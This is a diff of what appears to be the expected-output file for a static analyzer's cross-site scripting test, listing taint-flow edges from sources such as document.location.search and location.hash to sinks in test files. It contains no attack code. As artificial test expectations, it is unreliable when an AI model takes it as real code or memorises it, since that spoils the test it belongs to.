tst.js:240:23:240:29 | tainted | provenance | | -| tst.js:240:23:240:29 | tainted | tst.js:227:28:227:46 | this.props.tainted3 | provenance | | -| tst.js:240:23:240:29 | tainted | tst.js:241:23:241:29 | tainted | provenance | | -| tst.js:241:23:241:29 | tainted | tst.js:231:32:231:49 | prevProps.tainted4 | provenance | | -| tst.js:241:23:241:29 | tainted | tst.js:255:23:255:29 | tainted | provenance | | -| tst.js:247:39:247:55 | props.propTainted | tst.js:251:60:251:82 | this.st ... Tainted | provenance | | -| tst.js:255:23:255:29 | tainted | tst.js:247:39:247:55 | props.propTainted | provenance | | -| tst.js:285:9:285:29 | tainted | tst.js:288:59:288:65 | tainted | provenance | | -| tst.js:285:19:285:29 | window.name | tst.js:285:9:285:29 | tainted | provenance | | -| tst.js:301:9:301:16 | location | tst.js:302:10:302:10 | e | provenance | | -| tst.js:302:10:302:10 | e | tst.js:303:20:303:20 | e | provenance | | -| tst.js:308:10:308:17 | location | tst.js:310:10:310:10 | e | provenance | | -| tst.js:310:10:310:10 | e | tst.js:311:20:311:20 | e | provenance | | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | provenance | | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams] | tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | provenance | | -| tst.js:327:18:327:34 | document.location | tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | provenance | | -| tst.js:327:18:327:34 | document.location | tst.js:327:10:327:35 | new URL ... cation) [searchParams] | provenance | | -| tst.js:331:7:331:43 | params | tst.js:332:18:332:23 | params | provenance | | -| tst.js:331:7:331:43 | params [MapValue] | tst.js:332:18:332:23 | params [MapValue] | provenance | | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | tst.js:331:16:331:43 | getTain ... hParams [MapValue] | provenance | | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | tst.js:331:16:331:43 | getTain ... hParams | provenance | | -| tst.js:331:16:331:43 | getTain ... hParams | tst.js:331:7:331:43 | params | provenance | | -| tst.js:331:16:331:43 | getTain ... hParams [MapValue] | tst.js:331:7:331:43 | params [MapValue] | provenance | | -| tst.js:332:18:332:23 | params | tst.js:332:18:332:35 | params.get('name') | provenance | Config | -| tst.js:332:18:332:23 | params [MapValue] | tst.js:332:18:332:35 | params.get('name') | provenance | | -| tst.js:341:12:341:37 | new URL ... cation) [hash] | tst.js:343:5:343:12 | getUrl() [hash] | provenance | | -| tst.js:341:20:341:36 | document.location | tst.js:341:12:341:37 | new URL ... cation) [hash] | provenance | | -| tst.js:343:5:343:12 | getUrl() [hash] | tst.js:343:5:343:17 | getUrl().hash | provenance | | -| tst.js:343:5:343:17 | getUrl().hash | tst.js:343:5:343:30 | getUrl( ... ring(1) | provenance | Config | -| tst.js:348:7:348:39 | target | tst.js:349:12:349:17 | target | provenance | | -| tst.js:348:16:348:39 | documen ... .search | tst.js:348:7:348:39 | target | provenance | | -| tst.js:355:10:355:42 | target | tst.js:356:16:356:21 | target | provenance | | -| tst.js:355:10:355:42 | target | tst.js:357:20:357:25 | target | provenance | | -| tst.js:355:19:355:42 | documen ... .search | tst.js:355:10:355:42 | target | provenance | | -| tst.js:356:16:356:21 | target | tst.js:357:20:357:25 | target | provenance | | -| tst.js:357:20:357:25 | target | tst.js:360:21:360:26 | target | provenance | | -| tst.js:357:20:357:25 | target | tst.js:363:18:363:23 | target | provenance | | -| tst.js:371:7:371:39 | target | tst.js:374:18:374:23 | target | provenance | | -| tst.js:371:16:371:39 | documen ... .search | tst.js:371:7:371:39 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:384:18:384:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:386:18:386:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:397:18:397:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:406:18:406:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:408:19:408:24 | target | provenance | | -| tst.js:381:16:381:39 | documen ... .search | tst.js:381:7:381:39 | target | provenance | | -| tst.js:386:18:386:23 | target | tst.js:386:18:386:29 | target.taint | provenance | | -| tst.js:391:3:391:8 | [post update] target [taint3] | tst.js:392:18:392:23 | target [taint3] | provenance | | -| tst.js:391:19:391:42 | documen ... .search | tst.js:391:3:391:8 | [post update] target [taint3] | provenance | | -| tst.js:392:18:392:23 | target [taint3] | tst.js:392:18:392:30 | target.taint3 | provenance | | -| tst.js:397:18:397:23 | target | tst.js:397:18:397:30 | target.taint5 | provenance | | -| tst.js:406:18:406:23 | target | tst.js:406:18:406:30 | target.taint7 | provenance | | -| tst.js:408:3:408:8 | [post update] target [taint8] | tst.js:408:19:408:24 | target [taint8] | provenance | | -| tst.js:408:3:408:8 | [post update] target [taint8] | tst.js:409:18:409:23 | target [taint8] | provenance | | -| tst.js:408:19:408:24 | target | tst.js:408:19:408:31 | target.taint8 | provenance | | -| tst.js:408:19:408:24 | target [taint8] | tst.js:408:19:408:31 | target.taint8 | provenance | | -| tst.js:408:19:408:31 | target.taint8 | tst.js:408:3:408:8 | [post update] target [taint8] | provenance | | -| tst.js:409:18:409:23 | target [taint8] | tst.js:409:18:409:30 | target.taint8 | provenance | | -| tst.js:416:7:416:46 | payload | tst.js:417:18:417:24 | payload | provenance | | -| tst.js:416:17:416:36 | window.location.hash | tst.js:416:17:416:46 | window. ... bstr(1) | provenance | | -| tst.js:416:17:416:36 | window.location.hash | tst.js:416:17:416:46 | window. ... bstr(1) | provenance | Config | -| tst.js:416:17:416:46 | window. ... bstr(1) | tst.js:416:7:416:46 | payload | provenance | | -| tst.js:419:7:419:55 | match | tst.js:421:20:421:24 | match | provenance | | -| tst.js:419:15:419:34 | window.location.hash | tst.js:419:15:419:55 | window. ... (\\w+)/) | provenance | | -| tst.js:419:15:419:55 | window. ... (\\w+)/) | tst.js:419:7:419:55 | match | provenance | | -| tst.js:421:20:421:24 | match | tst.js:421:20:421:27 | match[1] | provenance | | -| tst.js:424:18:424:37 | window.location.hash | tst.js:424:18:424:48 | window. ... it('#') [1] | provenance | Config | -| tst.js:424:18:424:48 | window. ... it('#') [1] | tst.js:424:18:424:51 | window. ... '#')[1] | provenance | | -| tst.js:428:7:428:39 | target | tst.js:430:18:430:23 | target | provenance | | -| tst.js:428:16:428:39 | documen ... .search | tst.js:428:7:428:39 | target | provenance | | -| tst.js:430:18:430:23 | target | tst.js:430:18:430:89 | target. ... data>') | provenance | | -| tst.js:436:6:436:38 | source | tst.js:440:28:440:33 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:441:33:441:38 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:442:34:442:39 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:443:41:443:46 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:444:44:444:49 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:445:32:445:37 | source | provenance | | -| tst.js:436:15:436:38 | documen ... .search | tst.js:436:6:436:38 | source | provenance | | -| tst.js:453:7:453:39 | source | tst.js:455:18:455:23 | source | provenance | | -| tst.js:453:7:453:39 | source | tst.js:456:36:456:41 | source | provenance | | -| tst.js:453:16:453:39 | documen ... .search | tst.js:453:7:453:39 | source | provenance | | -| tst.js:456:36:456:41 | source | tst.js:456:18:456:42 | ansiToH ... source) | provenance | | -| tst.js:460:6:460:38 | source | tst.js:463:21:463:26 | source | provenance | | -| tst.js:460:6:460:38 | source | tst.js:465:19:465:24 | source | provenance | | -| tst.js:460:6:460:38 | source | tst.js:467:20:467:25 | source | provenance | | -| tst.js:460:15:460:38 | documen ... .search | tst.js:460:6:460:38 | source | provenance | | -| tst.js:471:7:471:46 | url | tst.js:473:19:473:21 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:474:26:474:28 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:475:25:475:27 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:476:20:476:22 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:486:22:486:24 | url | provenance | | -| tst.js:471:13:471:36 | documen ... .search | tst.js:471:13:471:46 | documen ... bstr(1) | provenance | Config | -| tst.js:471:13:471:46 | documen ... bstr(1) | tst.js:471:7:471:46 | url | provenance | | -| tst.js:491:23:491:35 | location.hash | tst.js:491:23:491:45 | locatio ... bstr(1) | provenance | Config | -| tst.js:494:18:494:30 | location.hash | tst.js:494:18:494:40 | locatio ... bstr(1) | provenance | Config | -| tst.js:501:43:501:62 | window.location.hash | tst.js:501:33:501:63 | decodeU ... n.hash) | provenance | | -| tst.js:508:7:508:39 | target | tst.js:509:18:509:23 | target | provenance | | -| tst.js:508:16:508:39 | documen ... .search | tst.js:508:7:508:39 | target | provenance | | -| tst.js:509:18:509:23 | target | tst.js:509:18:509:54 | target. ... "), '') | provenance | | +| tst.js:6:37:6:58 | documen ... on.href | tst.js:6:37:6:114 | documen ... t=")+8) | provenance | | +| tst.js:6:37:6:58 | documen ... on.href | tst.js:6:37:6:114 | documen ... t=")+8) | provenance | Config | +| tst.js:6:37:6:114 | documen ... t=")+8) | tst.js:6:18:6:126 | "" | provenance | | +| tst.js:6:37:6:114 | documen ... t=")+8) | tst.js:6:18:6:126 | "" | provenance | | +| tst.js:6:37:6:114 | documen ... t=")+8) | tst.js:6:18:6:126 | "" | provenance | Config | +| tst.js:9:28:9:33 | target | tst.js:9:5:9:42 | '
    ' | provenance | Config | +| tst.js:14:7:14:56 | params | tst.js:15:18:15:23 | params | provenance | | +| tst.js:14:7:14:56 | params [MapValue] | tst.js:15:18:15:23 | params [MapValue] | provenance | | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | provenance | | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | tst.js:14:16:14:56 | (new UR ... hParams | provenance | | +| tst.js:14:16:14:56 | (new UR ... hParams | tst.js:14:7:14:56 | params | provenance | | +| tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | tst.js:14:7:14:56 | params [MapValue] | provenance | | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | provenance | | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams] | tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | provenance | | +| tst.js:14:25:14:41 | document.location | tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | provenance | | +| tst.js:14:25:14:41 | document.location | tst.js:14:17:14:42 | new URL ... cation) [searchParams] | provenance | | +| tst.js:15:18:15:23 | params | tst.js:15:18:15:35 | params.get('name') | provenance | Config | +| tst.js:15:18:15:23 | params [MapValue] | tst.js:15:18:15:35 | params.get('name') | provenance | | +| tst.js:17:7:17:61 | searchParams | tst.js:18:18:18:29 | searchParams | provenance | | +| tst.js:17:7:17:61 | searchParams [MapValue] | tst.js:18:18:18:29 | searchParams [MapValue] | provenance | | +| tst.js:17:22:17:61 | new URL ... ing(1)) | tst.js:17:7:17:61 | searchParams | provenance | | +| tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | tst.js:17:7:17:61 | searchParams [MapValue] | provenance | | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | Config | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | Config | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:18:18:18:29 | searchParams | tst.js:18:18:18:41 | searchP ... 'name') | provenance | Config | +| tst.js:18:18:18:29 | searchParams [MapValue] | tst.js:18:18:18:41 | searchP ... 'name') | provenance | | +| tst.js:21:14:21:19 | target | tst.js:22:18:22:23 | target | provenance | | +| tst.js:24:5:24:28 | documen ... .search | tst.js:21:14:21:19 | target | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:29:16:29:20 | bar() | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:48:26:48:30 | bar() | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:56:16:56:20 | bar() | provenance | | +| tst.js:31:14:31:14 | x | tst.js:32:10:32:10 | x | provenance | | +| tst.js:34:20:34:43 | documen ... .search | tst.js:31:14:31:14 | x | provenance | | +| tst.js:34:20:34:43 | documen ... .search | tst.js:34:16:34:44 | baz(doc ... search) | provenance | | +| tst.js:36:15:36:15 | s | tst.js:37:20:37:20 | s | provenance | | +| tst.js:36:15:36:15 | s | tst.js:37:20:37:20 | s | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
    " ...
    " | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
    " ...
    " | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
    " ...
    " | provenance | Config | +| tst.js:39:21:39:44 | documen ... .search | tst.js:36:15:36:15 | s | provenance | | +| tst.js:39:21:39:44 | documen ... .search | tst.js:39:16:39:45 | wrap(do ... search) | provenance | | +| tst.js:39:21:39:44 | documen ... .search | tst.js:39:16:39:45 | wrap(do ... search) | provenance | Config | +| tst.js:41:15:41:15 | s | tst.js:43:12:43:12 | s | provenance | | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | Config | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | Config | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | provenance | | +| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | chop(do ... search) | provenance | | +| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | chop(do ... search) | provenance | Config | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | provenance | | +| tst.js:47:21:47:44 | documen ... .search | tst.js:47:16:47:45 | chop(do ... search) | provenance | | +| tst.js:47:21:47:44 | documen ... .search | tst.js:47:16:47:45 | chop(do ... search) | provenance | Config | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | Config | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | provenance | | +| tst.js:48:26:48:30 | bar() | tst.js:48:21:48:31 | chop(bar()) | provenance | | +| tst.js:48:26:48:30 | bar() | tst.js:48:21:48:31 | chop(bar()) | provenance | Config | +| tst.js:50:34:50:34 | s | tst.js:51:18:51:18 | s | provenance | | +| tst.js:53:25:53:48 | documen ... .search | tst.js:50:34:50:34 | s | provenance | | +| tst.js:54:25:54:48 | documen ... .search | tst.js:50:34:50:34 | s | provenance | | +| tst.js:58:1:58:27 | [,docum ... search] [1] | tst.js:58:46:58:46 | x | provenance | | +| tst.js:58:3:58:26 | documen ... .search | tst.js:58:1:58:27 | [,docum ... search] [1] | provenance | | +| tst.js:58:46:58:46 | x | tst.js:60:20:60:20 | x | provenance | | +| tst.js:93:7:93:44 | v | tst.js:95:18:95:18 | v | provenance | | +| tst.js:93:7:93:44 | v | tst.js:120:18:120:18 | v | provenance | | +| tst.js:93:11:93:34 | documen ... .search | tst.js:93:11:93:44 | documen ... bstr(1) | provenance | | +| tst.js:93:11:93:34 | documen ... .search | tst.js:93:11:93:44 | documen ... bstr(1) | provenance | Config | +| tst.js:93:11:93:44 | documen ... bstr(1) | tst.js:93:7:93:44 | v | provenance | | +| tst.js:132:29:132:50 | window. ... .search | tst.js:135:29:135:29 | v | provenance | | +| tst.js:135:29:135:29 | v | tst.js:135:49:135:49 | v | provenance | | +| tst.js:142:40:142:61 | window. ... .search | tst.js:139:29:139:46 | xssSourceService() | provenance | | +| tst.js:161:9:161:41 | target | tst.js:164:28:164:33 | target | provenance | | +| tst.js:161:18:161:41 | documen ... .search | tst.js:161:9:161:41 | target | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:170:31:170:37 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:172:42:172:48 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:173:33:173:39 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:175:54:175:60 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:176:45:176:51 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:177:49:177:55 | tainted | provenance | | +| tst.js:168:19:168:42 | documen ... .search | tst.js:168:9:168:42 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:183:67:183:73 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:184:67:184:73 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:220:35:220:41 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:222:20:222:26 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:224:23:224:29 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:225:23:225:29 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:239:23:239:29 | tainted | provenance | | +| tst.js:181:19:181:42 | documen ... .search | tst.js:181:9:181:42 | tainted | provenance | | +| tst.js:183:67:183:73 | tainted | tst.js:184:67:184:73 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:188:35:188:41 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:190:46:190:52 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:191:38:191:44 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:192:35:192:41 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:220:35:220:41 | tainted | provenance | | +| tst.js:188:35:188:41 | tainted | tst.js:196:28:196:46 | this.state.tainted1 | provenance | | +| tst.js:190:46:190:52 | tainted | tst.js:197:28:197:46 | this.state.tainted2 | provenance | | +| tst.js:191:38:191:44 | tainted | tst.js:198:28:198:46 | this.state.tainted3 | provenance | | +| tst.js:192:35:192:41 | tainted | tst.js:202:32:202:49 | prevState.tainted4 | provenance | | +| tst.js:220:35:220:41 | tainted | tst.js:209:28:209:46 | this.props.tainted1 | provenance | | +| tst.js:220:35:220:41 | tainted | tst.js:222:20:222:26 | tainted | provenance | | +| tst.js:222:20:222:26 | tainted | tst.js:210:28:210:46 | this.props.tainted2 | provenance | | +| tst.js:222:20:222:26 | tainted | tst.js:224:23:224:29 | tainted | provenance | | +| tst.js:224:23:224:29 | tainted | tst.js:211:28:211:46 | this.props.tainted3 | provenance | | +| tst.js:224:23:224:29 | tainted | tst.js:225:23:225:29 | tainted | provenance | | +| tst.js:225:23:225:29 | tainted | tst.js:215:32:215:49 | prevProps.tainted4 | provenance | | +| tst.js:225:23:225:29 | tainted | tst.js:239:23:239:29 | tainted | provenance | | +| tst.js:231:39:231:55 | props.propTainted | tst.js:235:60:235:82 | this.st ... Tainted | provenance | | +| tst.js:239:23:239:29 | tainted | tst.js:231:39:231:55 | props.propTainted | provenance | | +| tst.js:269:9:269:29 | tainted | tst.js:272:59:272:65 | tainted | provenance | | +| tst.js:269:19:269:29 | window.name | tst.js:269:9:269:29 | tainted | provenance | | +| tst.js:285:9:285:16 | location | tst.js:286:10:286:10 | e | provenance | | +| tst.js:286:10:286:10 | e | tst.js:287:20:287:20 | e | provenance | | +| tst.js:292:10:292:17 | location | tst.js:294:10:294:10 | e | provenance | | +| tst.js:294:10:294:10 | e | tst.js:295:20:295:20 | e | provenance | | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | provenance | | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams] | tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | provenance | | +| tst.js:311:18:311:34 | document.location | tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | provenance | | +| tst.js:311:18:311:34 | document.location | tst.js:311:10:311:35 | new URL ... cation) [searchParams] | provenance | | +| tst.js:315:7:315:43 | params | tst.js:316:18:316:23 | params | provenance | | +| tst.js:315:7:315:43 | params [MapValue] | tst.js:316:18:316:23 | params [MapValue] | provenance | | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | tst.js:315:16:315:43 | getTain ... hParams [MapValue] | provenance | | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | tst.js:315:16:315:43 | getTain ... hParams | provenance | | +| tst.js:315:16:315:43 | getTain ... hParams | tst.js:315:7:315:43 | params | provenance | | +| tst.js:315:16:315:43 | getTain ... hParams [MapValue] | tst.js:315:7:315:43 | params [MapValue] | provenance | | +| tst.js:316:18:316:23 | params | tst.js:316:18:316:35 | params.get('name') | provenance | Config | +| tst.js:316:18:316:23 | params [MapValue] | tst.js:316:18:316:35 | params.get('name') | provenance | | +| tst.js:325:12:325:37 | new URL ... cation) [hash] | tst.js:327:5:327:12 | getUrl() [hash] | provenance | | +| tst.js:325:20:325:36 | document.location | tst.js:325:12:325:37 | new URL ... cation) [hash] | provenance | | +| tst.js:327:5:327:12 | getUrl() [hash] | tst.js:327:5:327:17 | getUrl().hash | provenance | | +| tst.js:327:5:327:17 | getUrl().hash | tst.js:327:5:327:30 | getUrl( ... ring(1) | provenance | Config | +| tst.js:332:7:332:39 | target | tst.js:333:12:333:17 | target | provenance | | +| tst.js:332:16:332:39 | documen ... .search | tst.js:332:7:332:39 | target | provenance | | +| tst.js:339:10:339:42 | target | tst.js:340:16:340:21 | target | provenance | | +| tst.js:339:10:339:42 | target | tst.js:341:20:341:25 | target | provenance | | +| tst.js:339:19:339:42 | documen ... .search | tst.js:339:10:339:42 | target | provenance | | +| tst.js:340:16:340:21 | target | tst.js:341:20:341:25 | target | provenance | | +| tst.js:341:20:341:25 | target | tst.js:344:21:344:26 | target | provenance | | +| tst.js:341:20:341:25 | target | tst.js:347:18:347:23 | target | provenance | | +| tst.js:355:7:355:39 | target | tst.js:357:18:357:23 | target | provenance | | +| tst.js:355:16:355:39 | documen ... .search | tst.js:355:7:355:39 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:367:18:367:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:369:18:369:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:380:18:380:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:389:18:389:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:391:19:391:24 | target | provenance | | +| tst.js:364:16:364:39 | documen ... .search | tst.js:364:7:364:39 | target | provenance | | +| tst.js:369:18:369:23 | target | tst.js:369:18:369:29 | target.taint | provenance | | +| tst.js:374:3:374:8 | [post update] target [taint3] | tst.js:375:18:375:23 | target [taint3] | provenance | | +| tst.js:374:19:374:42 | documen ... .search | tst.js:374:3:374:8 | [post update] target [taint3] | provenance | | +| tst.js:375:18:375:23 | target [taint3] | tst.js:375:18:375:30 | target.taint3 | provenance | | +| tst.js:380:18:380:23 | target | tst.js:380:18:380:30 | target.taint5 | provenance | | +| tst.js:389:18:389:23 | target | tst.js:389:18:389:30 | target.taint7 | provenance | | +| tst.js:391:3:391:8 | [post update] target [taint8] | tst.js:391:19:391:24 | target [taint8] | provenance | | +| tst.js:391:3:391:8 | [post update] target [taint8] | tst.js:392:18:392:23 | target [taint8] | provenance | | +| tst.js:391:19:391:24 | target | tst.js:391:19:391:31 | target.taint8 | provenance | | +| tst.js:391:19:391:24 | target [taint8] | tst.js:391:19:391:31 | target.taint8 | provenance | | +| tst.js:391:19:391:31 | target.taint8 | tst.js:391:3:391:8 | [post update] target [taint8] | provenance | | +| tst.js:392:18:392:23 | target [taint8] | tst.js:392:18:392:30 | target.taint8 | provenance | | +| tst.js:399:7:399:46 | payload | tst.js:400:18:400:24 | payload | provenance | | +| tst.js:399:17:399:36 | window.location.hash | tst.js:399:17:399:46 | window. ... bstr(1) | provenance | | +| tst.js:399:17:399:36 | window.location.hash | tst.js:399:17:399:46 | window. ... bstr(1) | provenance | Config | +| tst.js:399:17:399:46 | window. ... bstr(1) | tst.js:399:7:399:46 | payload | provenance | | +| tst.js:402:7:402:55 | match | tst.js:404:20:404:24 | match | provenance | | +| tst.js:402:15:402:34 | window.location.hash | tst.js:402:15:402:55 | window. ... (\\w+)/) | provenance | | +| tst.js:402:15:402:55 | window. ... (\\w+)/) | tst.js:402:7:402:55 | match | provenance | | +| tst.js:404:20:404:24 | match | tst.js:404:20:404:27 | match[1] | provenance | | +| tst.js:407:18:407:37 | window.location.hash | tst.js:407:18:407:48 | window. ... it('#') [1] | provenance | Config | +| tst.js:407:18:407:48 | window. ... it('#') [1] | tst.js:407:18:407:51 | window. ... '#')[1] | provenance | | +| tst.js:411:7:411:39 | target | tst.js:413:18:413:23 | target | provenance | | +| tst.js:411:16:411:39 | documen ... .search | tst.js:411:7:411:39 | target | provenance | | +| tst.js:413:18:413:23 | target | tst.js:413:18:413:89 | target. ... data>') | provenance | | +| tst.js:419:6:419:38 | source | tst.js:423:28:423:33 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:424:33:424:38 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:425:34:425:39 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:426:41:426:46 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:427:44:427:49 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:428:32:428:37 | source | provenance | | +| tst.js:419:15:419:38 | documen ... .search | tst.js:419:6:419:38 | source | provenance | | +| tst.js:436:7:436:39 | source | tst.js:438:18:438:23 | source | provenance | | +| tst.js:436:7:436:39 | source | tst.js:439:36:439:41 | source | provenance | | +| tst.js:436:16:436:39 | documen ... .search | tst.js:436:7:436:39 | source | provenance | | +| tst.js:439:36:439:41 | source | tst.js:439:18:439:42 | ansiToH ... source) | provenance | | +| tst.js:443:6:443:38 | source | tst.js:446:21:446:26 | source | provenance | | +| tst.js:443:6:443:38 | source | tst.js:448:19:448:24 | source | provenance | | +| tst.js:443:6:443:38 | source | tst.js:450:20:450:25 | source | provenance | | +| tst.js:443:15:443:38 | documen ... .search | tst.js:443:6:443:38 | source | provenance | | +| tst.js:454:7:454:46 | url | tst.js:456:19:456:21 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:457:26:457:28 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:458:25:458:27 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:459:20:459:22 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:469:22:469:24 | url | provenance | | +| tst.js:454:13:454:36 | documen ... .search | tst.js:454:13:454:46 | documen ... bstr(1) | provenance | Config | +| tst.js:454:13:454:46 | documen ... bstr(1) | tst.js:454:7:454:46 | url | provenance | | +| tst.js:474:23:474:35 | location.hash | tst.js:474:23:474:45 | locatio ... bstr(1) | provenance | Config | +| tst.js:477:18:477:30 | location.hash | tst.js:477:18:477:40 | locatio ... bstr(1) | provenance | Config | +| tst.js:484:43:484:62 | window.location.hash | tst.js:484:33:484:63 | decodeU ... n.hash) | provenance | | +| tst.js:491:7:491:39 | target | tst.js:492:18:492:23 | target | provenance | | +| tst.js:491:16:491:39 | documen ... .search | tst.js:491:7:491:39 | target | provenance | | +| tst.js:492:18:492:23 | target | tst.js:492:18:492:54 | target. ... "), '') | provenance | | | typeahead.js:20:13:20:45 | target | typeahead.js:21:12:21:17 | target | provenance | | | typeahead.js:20:22:20:45 | documen ... .search | typeahead.js:20:13:20:45 | target | provenance | | | typeahead.js:21:12:21:17 | target | typeahead.js:24:30:24:32 | val | provenance | | @@ -1207,261 +791,677 @@ edges | winjs.js:2:17:2:40 | documen ... .search | winjs.js:2:17:2:53 | documen ... ring(1) | provenance | | | winjs.js:2:17:2:40 | documen ... .search | winjs.js:2:17:2:53 | documen ... ring(1) | provenance | Config | | winjs.js:2:17:2:53 | documen ... ring(1) | winjs.js:2:7:2:53 | tainted | provenance | | +nodes +| addEventListener.js:1:43:1:47 | event | semmle.label | event | +| addEventListener.js:2:20:2:24 | event | semmle.label | event | +| addEventListener.js:2:20:2:29 | event.data | semmle.label | event.data | +| addEventListener.js:5:43:5:48 | data | semmle.label | data | +| addEventListener.js:5:43:5:48 | {data} | semmle.label | {data} | +| addEventListener.js:6:20:6:23 | data | semmle.label | data | +| addEventListener.js:10:21:10:25 | event | semmle.label | event | +| addEventListener.js:12:24:12:28 | event | semmle.label | event | +| addEventListener.js:12:24:12:33 | event.data | semmle.label | event.data | +| angular2-client.ts:24:44:24:71 | \\u0275getDOM ... ().href | semmle.label | \\u0275getDOM ... ().href | +| angular2-client.ts:26:44:26:69 | this.ro ... .params | semmle.label | this.ro ... .params | +| angular2-client.ts:26:44:26:73 | this.ro ... ams.foo | semmle.label | this.ro ... 